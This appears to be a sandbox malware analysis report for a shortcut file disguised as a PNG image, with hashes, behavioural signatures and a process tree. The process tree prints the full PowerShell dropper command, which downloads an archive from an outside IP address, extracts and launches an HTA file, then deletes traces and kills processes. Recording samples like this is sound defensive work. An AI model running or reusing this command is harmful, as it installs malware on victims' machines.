Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11/06/2024, 18:52
Static task
static1
Behavioral task
behavioral1
Sample
package1107.png.lnk
Resource
win7-20240221-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
package1107.png.lnk
Resource
win10v2004-20240508-en
7 signatures
150 seconds
General
-
Target
package1107.png.lnk
-
Size
3KB
-
MD5
1710c8b7256fa77140ac76ee970a7ffd
-
SHA1
2e316969780e70903d1a7c200a587c7cfacb871d
-
SHA256
b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831
-
SHA512
bd8e7191889061fe364b2f76cd67660c02a5984f0ff88650081303fe24e6224b35606ff7cca6cf8fdff80f334c0e3ca55b25345848016f8ac7d800d3c866c0b7
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://94.154.172.166/wvqv/ex.png
Signatures
-
pid Process 1972 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1972 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1736 wrote to memory of 2924 1736 cmd.exe 29 PID 1736 wrote to memory of 2924 1736 cmd.exe 29 PID 1736 wrote to memory of 2924 1736 cmd.exe 29 PID 2924 wrote to memory of 1972 2924 cmd.exe 30 PID 2924 wrote to memory of 1972 2924 cmd.exe 30 PID 2924 wrote to memory of 1972 2924 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\package1107.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-